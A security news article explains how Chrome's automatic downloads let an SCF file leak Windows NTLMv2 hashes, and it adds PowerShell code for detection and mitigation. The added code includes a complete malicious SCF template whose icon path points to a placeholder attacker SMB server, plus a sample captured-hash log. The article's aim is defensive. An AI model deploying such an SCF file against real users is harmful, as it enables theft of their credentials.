Critical Google Chrome vulnerability could expose your passwords: how to protect yourself
A serious vulnerability has been discovered in Google's Chrome web browser that could allow attackers to remotely steal victims' Windows login credentials, and with them the passwords of Microsoft accounts used to sign in to Windows. Luckily, some workarounds exist to contain the issue until Google releases a security update.
The vulnerability lies in the way Chrome downloads files in its default configuration. The latest version of the popular browser downloads files automatically whenever it deems them safe. Even when a malicious file is downloaded this way, the user would normally still have to open it before it could do any harm. But what happens if the downloaded file requires no user interaction at all?
This is where the trouble begins. SCF (Shell Command File) files are plain text files that contain a few Windows Explorer commands (the classic "Show Desktop" shortcut is one example) and, optionally, the location of the icon Explorer should display for the file. Because Chrome treats SCF files as safe and downloads them automatically, a remote attacker only needs to lure the user to a website that serves a malicious SCF file.
Once the file is downloaded, the request is triggered the moment the download directory is opened in Windows File Explorer, whether to view the file, delete it or work with other files there (which is practically inevitable). There is no need to click or open the downloaded file: Windows File Explorer automatically tries to retrieve the file's icon from the location named in it.
An SCF file whose icon entry points at a remote SMB server set up by the attacker therefore tricks Windows into attempting to authenticate to that server, which lets the attacker capture the victim's username and NTLMv2 password hash for offline cracking.
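The following is an added example and not code from the original article or from the researcher who reported the issue. It shows the anatomy of an SCF file that leaks credentials, and a small PowerShell scanner that flags such files in a folder. The host 192.0.2.10 is a documentation address standing in for an attacker-controlled SMB server.

```powershell
# Added example (not from the original article). 192.0.2.10 is a placeholder
# for an attacker-controlled SMB server.

# A minimal SCF file. Everything except the IconFile line is the ordinary
# "show desktop" command that legitimate SCF files carry. The IconFile value is a
# UNC path, so when Explorer lists the folder it connects to \\192.0.2.10 to
# render the icon and authenticates with the logged-on user's NTLM credentials.
$MaliciousScf = @"
[Shell]
Command=2
IconFile=\\192.0.2.10\share\icon.ico
[Taskbar]
Command=ToggleDesktop
"@

function Get-ScfIconTarget {
    # Parse the INI-style content of an SCF file and return the UNC icon
    # location, if any, together with the host Explorer would contact.
    param([Parameter(Mandatory)][AllowEmptyString()][string]$Content)

    foreach ($line in ($Content -split "`r?`n")) {
        if ($line -match '^\s*IconFile\s*=\s*(\\\\[^\\]+\\.*)$') {
            $unc = $Matches[1].Trim()
            $remoteHost = ($unc.TrimStart('\') -split '\\')[0]
            return [pscustomobject]@{ IconFile = $unc; RemoteHost = $remoteHost }
        }
    }
    return $null   # local icon path or no icon entry: no network request
}

function Find-UncIconScf {
    # List every .scf file in a folder (the Chrome download folder by default)
    # whose icon points at a remote share.
    param([string]$Path = (Join-Path $env:USERPROFILE 'Downloads'))

    Get-ChildItem -Path $Path -Filter '*.scf' -File -ErrorAction SilentlyContinue |
        ForEach-Object {
            $target = Get-ScfIconTarget -Content (Get-Content -Path $_.FullName -Raw)
            if ($target) {
                [pscustomobject]@{
                    File       = $_.FullName
                    IconFile   = $target.IconFile
                    RemoteHost = $target.RemoteHost
                }
            }
        }
}

# Check the constructed sample in memory. It is deliberately not written to a
# folder: opening that folder in Explorer is exactly what triggers the request.
Get-ScfIconTarget -Content $MaliciousScf

# Audit the real download folder and remove flagged files from the shell
# (drop -WhatIf to actually delete them).
Find-UncIconScf | ForEach-Object { Remove-Item -LiteralPath $_.File -WhatIf }
```

Delete flagged files from a shell rather than from Explorer: browsing to the folder with Explorer is what causes the icon lookup and the authentication attempt, so the cleanup itself would leak the hash.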
The information captured by the attacker, containing the victim's username, domain name and password hash, looks like this:
NTLMv2 Response Captured from 126.96.36.199:62521 – 188.8.131.52
USER:Bosko DOMAIN:Master OS: LM:
It is strongly recommended to disable automatic downloading in Chrome. To do so, go to Settings -> Show advanced settings -> Downloads and tick the 'Ask where to save each file before downloading' option.
Manually approving each download significantly reduces the risk of NTLMv2 credential theft via SCF files. Note that the prompt only helps if users actually cancel downloads they did not ask for: an SCF file saved through the prompt is just as dangerous once its folder is opened.
System administrators can additionally block outbound SMB traffic (LAN to WAN) by denying TCP ports 139 and 445 at the perimeter firewall, so that the authentication attempt never reaches the attacker's server.
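The following is an added example, not code from the original article, showing how to apply both workarounds from an elevated PowerShell prompt on a Windows host. The Chrome policy name is Chrome's own PromptForDownloadLocation policy; the LAN address ranges are an assumption and must be adjusted to your own address plan.

```powershell
# Added example (not from the original article). Run from an elevated prompt.

# 1. Make Chrome ask where to save every download, via Chrome's
#    PromptForDownloadLocation policy. Set as a machine policy it is enforced
#    for every user and shows as managed in chrome://policy, so the user cannot
#    quietly switch automatic downloads back on in the settings page.
$chromePolicy = 'HKLM:\SOFTWARE\Policies\Google\Chrome'
if (-not (Test-Path -Path $chromePolicy)) {
    New-Item -Path $chromePolicy -Force | Out-Null
}
New-ItemProperty -Path $chromePolicy -Name 'PromptForDownloadLocation' `
    -PropertyType DWord -Value 1 -Force | Out-Null

# 2. Block outbound SMB to everything except the local network. Windows Firewall
#    has no "everything except" address selector and a Block rule always beats an
#    Allow rule, so the rule lists the public address ranges explicitly: all of
#    IPv4 minus the RFC 1918 blocks 10/8, 172.16/12 and 192.168/16 (assumed LAN).
$publicRanges = @(
    '1.0.0.0-9.255.255.255',
    '11.0.0.0-172.15.255.255',
    '172.32.0.0-192.167.255.255',
    '192.169.0.0-223.255.255.255'
)
$ruleName = 'Block outbound SMB to non-LAN hosts (SCF/NTLM leak)'
if (-not (Get-NetFirewallRule -DisplayName $ruleName -ErrorAction SilentlyContinue)) {
    New-NetFirewallRule -DisplayName $ruleName `
        -Direction Outbound -Action Block -Enabled True `
        -Protocol TCP -RemotePort 139, 445 `
        -RemoteAddress $publicRanges -Profile Any | Out-Null
}

# Verify: the rule exists with the expected address filter, and the policy value is set.
Get-NetFirewallRule -DisplayName $ruleName | Get-NetFirewallAddressFilter
Get-ItemProperty -Path $chromePolicy -Name 'PromptForDownloadLocation'
```

Two caveats. The host rule also blocks legitimate SMB to any server outside the listed LAN ranges (cloud file shares, for example), so extend the exclusions as needed, and it does nothing against an attacker who is already on the local network, which is why the perimeter block described above is still worth having. Also, this only covers SMB: if the WebClient service is running, Windows can retry a UNC path over WebDAV on ports 80 and 443, so consider disabling that service on machines that do not need it.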